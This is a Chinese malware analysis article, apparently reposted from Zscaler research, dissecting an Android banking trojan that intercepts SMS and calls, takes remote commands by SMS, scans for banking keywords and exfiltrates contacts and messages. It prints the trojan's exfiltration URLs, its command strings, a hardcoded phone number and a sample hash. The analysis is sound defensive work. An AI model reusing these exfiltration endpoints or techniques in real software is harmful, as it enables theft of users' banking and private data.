揭秘:针对中国移动用户的强大网银木马剖析
我们最近遇到一个安卓平台的网银木马,该木马主要瞄向中国的移动用户,检出率很低。该安卓木马能够拦截短信并寻找特定的关键字,盗取用户网银信息。此外,它还会从用户的移动设备中盗取所有的联系人信息,并将其发送到远程服务器。
木马相关信息
名字:888.apk
MD5:ff081c1400a948f2bcc4952fed2c818b。
VT: 7/56 (分析该木马时)
样本: 点我下载
木马功能:
1、拦截和捕获所有接收和发出的短信 2、拦截来电和结束通话的功能 3、通过短信接收C&C服务器指令 4、将盗取的数据通过短信、电子邮件、web请求发送到C&C服务器
代码级功能分析
下面就让我们一起分析下该木马的特征和功能实现:
0×01 捕获邮箱和手机号
在上面的截图中,可以看到,该木马将捕获的出站短信通过电子邮件发送到硬编码的163. Com邮箱地址。它将盗取的数据以“发给xxx的短信”为主题发送出去。
在这里,可以看到它将捕获到的入站短信以同样的参数用邮件发送到指定邮箱。此外,它还将同样的信息通过短信发送到一个硬编码的中国手机号码“15996581524”。
0×02 电话拦截
上图显示了该木马具有拦截来电的功能,并能够将来电号码以主题为“拨打进来的一次来电!”的邮件发送出去,而且它还有挂断电话的功能。
0×03 远程控制
该木马还能够通过短信接收C&C服务器发送的指令,该指令由木马作者远程发送。
在上面的截图中可以看到,攻击者可以通过短信发送指令“intercept#”来开始数据的捕获行为,还能够通过短信发送指令“interceptstop#”来停止捕获行为。
在上面的截图中我们可以看到,与网银交易有关的地方都做了字符串检测处理,它可以检测如“支付”、”校验”、”银行”、“余额”、“验证”的字符串,这很明显地表明木马的作者意图嗅探与网银相关的信息。
恶意软件将短信接收器和拨出电话服务的优先级设置为高优先级,这将确保当这些事件发生时,该木马比其他应用拥有更高的处理优先权。
0×04 请求发送
从上图中我们也能看到一些代码,这些代码能够确保该木马将盗取的联系人信息和短信数据通过Web请求的方式发送出去。
然而,在当前版本的木马中,这个功能似乎并不起作用……我们猜测可能是木马的作者仍旧在测试这个功能。
"http://192.168.1.102/input/input_data_get_contact.asp?user=XXX&pwd=XXXX&addr="
"http://192.168.1.102/input/input_data_get_sms.asp?user=XXX&pwd=XXX&addr=XXX&id=XXX"
木马窃取信息截图
下面的截图只是一个示例,显示木马的作者通过该恶意APK从感染用户那里捕获隐私信息。
1、发送邮件
2、拦截呼入电话
3、窃取联系人信息
4、受感染的中国移动用户
经过上面的一系列描述,我们已经可以看到这款移动平台的网银盗窃木马的威力。鉴于木马往往升级频繁,逃避查杀的能力也会与日俱增。我们相信未来,木马对抗将面临更大的挑战。
[参考来源 research.zscaler ,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)]